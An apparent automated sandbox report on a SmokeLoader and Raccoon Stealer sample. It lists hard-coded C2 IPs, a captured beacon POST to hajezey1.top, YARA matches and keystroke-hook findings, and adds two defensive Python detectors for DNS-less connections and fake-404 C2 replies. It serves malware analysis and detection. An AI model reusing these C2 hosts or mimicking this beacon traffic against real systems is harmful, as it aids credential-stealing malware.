cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
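The fifty "TCP traffic detected without corresponding DNS query" entries above are the sandbox's way of saying the sample carries its C2 addresses (216.128.137.31 and 91.219.236.97) as hard-coded IPs rather than resolving a name first, which is why a resolver-side blocklist never sees them. The same check can be run over your own DNS and connection logs. The script below is an added example written for this page, not code from the report or from Joe Sandbox: it indexes every IP returned in a DNS answer, then flags outbound connections to a public IP that no answer in the preceding window contained, and counts them per destination instead of emitting one alert per connection. The sample events are constructed to mirror the entries above (3 connections to 216.128.137.31, 47 to 91.219.236.97); the destination ports, the timestamps and the example.com lookup are assumptions, since the report does not show them.

```python
"""Find outbound TCP connections whose destination never appeared in a DNS answer."""
import ipaddress
from collections import Counter, defaultdict
from datetime import datetime, timedelta

DNS_WINDOW = timedelta(minutes=10)   # how long a resolved answer counts as "fresh"


def _is_internal(ip: str) -> bool:
    """Skip destinations a host legitimately reaches without DNS (RFC1918, loopback, ...)."""
    addr = ipaddress.ip_address(ip)
    return addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_multicast


def connections_without_dns(dns_events, conn_events, window=DNS_WINDOW):
    """dns_events: (time, qname, [answer ips]); conn_events: (time, dst_ip, dst_port).
    Returns Counter {(dst_ip, dst_port): n} for connections not preceded by an answer
    containing dst_ip within `window`."""
    answered = defaultdict(list)                  # ip -> times a DNS answer contained it
    for ts, _qname, ips in dns_events:
        for ip in ips:
            answered[ip].append(ts)
    hits = Counter()
    for ts, dst_ip, dst_port in conn_events:
        if _is_internal(dst_ip):
            continue
        if any(ts - window <= t <= ts for t in answered.get(dst_ip, ())):
            continue                              # resolved recently: normal behaviour
        hits[(dst_ip, dst_port)] += 1
    return hits


def summarize(hits) -> list:
    """One line per destination, busiest first, instead of one alert per connection."""
    return [f"{ip}:{port} reached {n} time(s) with no DNS resolution"
            for (ip, port), n in hits.most_common()]


# Constructed sample logs modelled on the sandbox entries above. Ports, timestamps
# and the example.com lookup are assumptions; the report does not record them.
T0 = datetime(2021, 10, 29, 18, 50, 0)
SAMPLE_DNS = [(T0 + timedelta(seconds=5), "example.com", ["93.184.216.34"])]
SAMPLE_CONNS = (
    [(T0 + timedelta(seconds=6), "93.184.216.34", 443)]               # resolved: ignored
    + [(T0 + timedelta(seconds=10 + i), "216.128.137.31", 80) for i in range(3)]
    + [(T0 + timedelta(seconds=20 + i), "91.219.236.97", 80) for i in range(47)]
    + [(T0 + timedelta(seconds=70), "192.168.2.1", 445)]              # internal: ignored
)

if __name__ == "__main__":
    for line in summarize(connections_without_dns(SAMPLE_DNS, SAMPLE_CONNS)):
        print(line)
```

Two caveats when running this outside a sandbox: an IP the host cached from a lookup made before log collection started will be flagged until the window catches up, so start the DNS feed earlier than the connection feed, and clients that use DNS over HTTPS never show a plaintext query at all, so their connections need to be exempted or their resolver's logs added to the DNS feed.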
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jaqhuuufk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: hajezey1.top
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49817 version: TLS 1.2
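The HTTP exchanges logged above, before the 200 OK zip download at the end, share three traits that a detector can key on: every reply from hajezey1.top is a 404; the Server header says nginx/1.20.1 while the body is either an Apache-branded error page naming hajezey1.top or, in the later replies, a few bytes to several kilobytes of non-HTML data served as text/html; and the request that triggers them is a POST to / whose Referer (jaqhuuufk.com) names a different domain than its Host (hajezey1.top). Serving C2 replies as fake 404s is the pattern SmokeLoader is known for, and it defeats any rule that treats 404s as uninteresting. The script below is an added example written for this page, not code from the report or from Joe Sandbox: it parses raw HTTP messages, reassembles chunked bodies, and tags each of those traits. The sample messages are constructed, shortened models of the captures above; the random-looking payload is a synthetic byte pattern standing in for the ciphertext, not the bytes the sandbox recorded.

```python
"""Heuristic checks for C2 replies dressed up as HTTP 404 error pages."""
import math
import re
from collections import Counter
from urllib.parse import urlparse


def _parse_headers(head: bytes) -> dict:
    """Turn the 'Name: value' lines after the start line into a lower-cased dict."""
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode(errors="replace")
    return headers


def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body; tolerates a truncated capture."""
    out = b""
    while True:
        size_line, _, rest = body.partition(b"\r\n")
        try:
            size = int(size_line.split(b";")[0].strip() or b"0", 16)
        except ValueError:
            break                       # capture cut mid-stream: keep what we have
        if size == 0:
            break
        out += rest[:size]
        body = rest[size + 2:]          # skip the CRLF that terminates the chunk data
    return out


def parse_http_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (status_code, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status = int(head.split(b"\r\n", 1)[0].split()[1])
    headers = _parse_headers(head)
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    return status, headers, body


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ciphertext sits near 8.0, an HTML error page near 4 to 5."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


_SERVER_IN_BODY = re.compile(rb"<address>([A-Za-z]+)/")


def suspicious_404(raw: bytes) -> list:
    """Tags describing why a 404 response looks like a C2 reply rather than an error."""
    status, headers, body = parse_http_response(raw)
    tags = []
    if status != 404:
        return tags
    # Declared text/html, but the body does not even start with a tag.
    if "text/html" in headers.get("content-type", "") and not body.lstrip().startswith(b"<"):
        tags.append("non-html-body")
    # Body is effectively random: an encrypted or compressed payload, not an error page.
    if len(body) >= 32 and shannon_entropy(body) > 7.0:
        tags.append("high-entropy-body")
    # Server header names one product, the canned error page in the body names another.
    m = _SERVER_IN_BODY.search(body)
    server = headers.get("server", "").lower()
    if m and server and m.group(1).decode().lower() not in server:
        tags.append("server-header-mismatch")
    return tags


def suspicious_request(raw: bytes) -> list:
    """Flag a request whose Referer points at a different host than its Host header."""
    headers = _parse_headers(raw.partition(b"\r\n\r\n")[0])
    host = headers.get("host", "").lower()
    referer_host = (urlparse(headers.get("referer", "")).hostname or "").lower()
    return ["referer-host-mismatch"] if host and referer_host and referer_host != host else []


def _chunked(payload: bytes) -> bytes:
    return b"%x\r\n%s\r\n0\r\n\r\n" % (len(payload), payload)


# Constructed samples modelled on the captures in this report (bodies shortened).
# _STANDIN_PAYLOAD is a synthetic byte pattern, NOT the data the sandbox recorded.
_STANDIN_PAYLOAD = bytes((i * 131 + 7) % 256 for i in range(512))
_NGINX_404 = (b"HTTP/1.1 404 Not Found\r\nServer: nginx/1.20.1\r\n"
              b"Content-Type: text/html; charset=utf-8\r\n")
SAMPLE_FAKE_404 = (_NGINX_404 + b"Transfer-Encoding: chunked\r\nConnection: close\r\n\r\n"
                   + _chunked(b"\x00\x00" + _STANDIN_PAYLOAD))
SAMPLE_DECOY_404 = (_NGINX_404 + b"Transfer-Encoding: chunked\r\nConnection: close\r\n\r\n"
                    + _chunked(b"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\r\n"
                               b"<html><head>\r\n<title>404 Not Found</title>\r\n</head><body>\r\n"
                               b"<h1>Not Found</h1>\r\n<hr><address>Apache/2.4.29 (Ubuntu) "
                               b"Server at hajezey1.top Port 80</address>\n</body></html>\r\n"))
SAMPLE_TINY_404 = (_NGINX_404 + b"Content-Length: 7\r\nConnection: keep-alive\r\n"
                   b"X-Powered-By: PHP/5.6.40\r\n\r\n\x03\x00\x00\x00\x1d=^")
SAMPLE_POST = (b"POST / HTTP/1.1\r\nConnection: Keep-Alive\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
               b"Referer: http://jaqhuuufk.com/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; "
               b"Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\nContent-Length: 250\r\n"
               b"Host: hajezey1.top\r\n\r\n")

if __name__ == "__main__":
    for name, sample in [("fake", SAMPLE_FAKE_404), ("decoy", SAMPLE_DECOY_404),
                         ("tiny", SAMPLE_TINY_404)]:
        print(name, suspicious_404(sample))
    print("post", suspicious_request(SAMPLE_POST))
```

The entropy check is the one that needs tuning in production: a 404 served with Content-Encoding: gzip or br is legitimately near 8 bits per byte, so exempt compressed responses before scoring (none of the captures above carry a Content-Encoding header, which is itself a hint that the "random" bodies are not compression). The server-name mismatch fires only when the body actually names a product, which is why the short binary replies are caught by the text/html check instead.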

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match File source: 11.2.9A4B.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.F7E3DjYJpC.exe.2d215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.20BD.exe.2fa0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.20BD.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.1.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.20BD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.iwbavbe.2bc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.iwbavbe.2c515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.888009215.0000000002C40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.876148906.0000000004C51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.873601079.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.741479676.0000000000451000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.726672116.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.807321223.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.807649884.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.890437795.00000000047D1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.741456691.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.845161453.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: 3C84.exe, 00000017.00000002.1072827490.000000000115B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer
Source: Yara match File source: 27.3.5483.exe.48d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.3.5483.exe.48d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000003.879658236.00000000048D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5483.exe PID: 6408, type: MEMORYSTR

System Summary:

.NET source code contains very large array initializations
Source: 31F4.exe.6.dr, ??????????????/_?????xptkvqfesn.cs Large array initialization: _?????nacpgkwmie: array initializer size 208904
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC2E2C5 20_2_6AC2E2C5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC332A9 20_2_6AC332A9
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1FA2B 20_2_6AC1FA2B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9EBB0 20_2_6AB9EBB0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC123E3 20_2_6AC123E3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC0EB8A 20_2_6AC0EB8A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABB8BE8 20_2_6ABB8BE8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9ABD8 20_2_6AB9ABD8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8AB40 20_2_6AB8AB40
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7B090 20_2_6AB7B090
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A830 20_2_6AB8A830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB66800 20_2_6AB66800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21002 20_2_6AC21002
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB98840 20_2_6AB98840
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB899BF 20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB84120 20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB86E30 20_2_6AB86E30
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC267E2 20_2_6AC267E2
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB92F70 20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB935D0 20_2_6AB935D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB60D20 20_2_6AB60D20
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_011441F0 23_2_011441F0
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01149390 23_2_01149390
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01141280 23_2_01141280
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01140520 23_2_01140520
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01143590 23_2_01143590
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_0114DA80 23_2_0114DA80
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01148DA0 23_2_01148DA0
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01140DD0 23_2_01140DD0
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01149F88 23_2_01149F88
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01149380 23_2_01149380
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01141278 23_2_01141278
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01140510 23_2_01140510
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_0114DA47 23_2_0114DA47
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01148D93 23_2_01148D93
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01140DC0 23_2_01140DC0
PE file contains strange resources
Source: 2CF4.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (2 resources)
Source: 20BD.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (7 resources)
Source: ssbavbe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (7 resources)
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Uses 32bit PE files
Source: F7E3DjYJpC.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 23.0.3C84.exe.b10000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.69B.exe.500000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.3C84.exe.b10000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.2.3C84.exe.b10000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.3C84.exe.b10000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.69B.exe.500000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.69B.exe.500000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.1254.exe.550000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.1254.exe.550000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.1254.exe.550000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.3C84.exe.b10000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.69B.exe.500000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.1254.exe.550000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\3C84.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\69B.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\1254.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: String function: 0040B550 appears 50 times
Source: C:\Users\user\AppData\Roaming\iwbavbe Code function: String function: 00420290 appears 40 times
Source: C:\Users\user\AppData\Roaming\iwbavbe Code function: String function: 0041D120 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: String function: 6ABBD08C appears 34 times
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: String function: 6AB6B150 appears 122 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_0040185B Sleep,NtTerminateProcess, 4_2_0040185B
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_00401866 Sleep,NtTerminateProcess, 4_2_00401866
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_0040187A Sleep,NtTerminateProcess, 4_2_0040187A
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_0040163B NtMapViewOfSection, 4_2_0040163B
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_004018D3 NtTerminateProcess, 4_2_004018D3
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_00401884 Sleep,NtTerminateProcess, 4_2_00401884
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_00401888 NtTerminateProcess, 4_2_00401888
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_0040156A NtMapViewOfSection, 4_2_0040156A
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 4_2_004015DB
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_004017EA Sleep,NtTerminateProcess, 4_2_004017EA
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_1_0040156A NtMapViewOfSection, 4_1_0040156A
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_1_004015DB NtMapViewOfSection,NtMapViewOfSection, 4_1_004015DB
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_1_0040163B NtMapViewOfSection, 4_1_0040163B
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_0040185B Sleep,NtTerminateProcess, 12_2_0040185B
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_00401866 Sleep,NtTerminateProcess, 12_2_00401866
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_0040187A Sleep,NtTerminateProcess, 12_2_0040187A
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_0040163B NtMapViewOfSection, 12_2_0040163B
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_004018D3 NtTerminateProcess, 12_2_004018D3
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_00401884 Sleep,NtTerminateProcess, 12_2_00401884
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_00401888 NtTerminateProcess, 12_2_00401888
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_0040156A NtMapViewOfSection, 12_2_0040156A
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 12_2_004015DB
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_004017EA Sleep,NtTerminateProcess, 12_2_004017EA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_0040181C Sleep,NtTerminateProcess, 20_2_0040181C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402406 NtEnumerateKey, 20_2_00402406
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00401F25 NtQuerySystemInformation, 20_2_00401F25
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00401828 Sleep,NtTerminateProcess, 20_2_00401828
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402431 NtEnumerateKey, 20_2_00402431
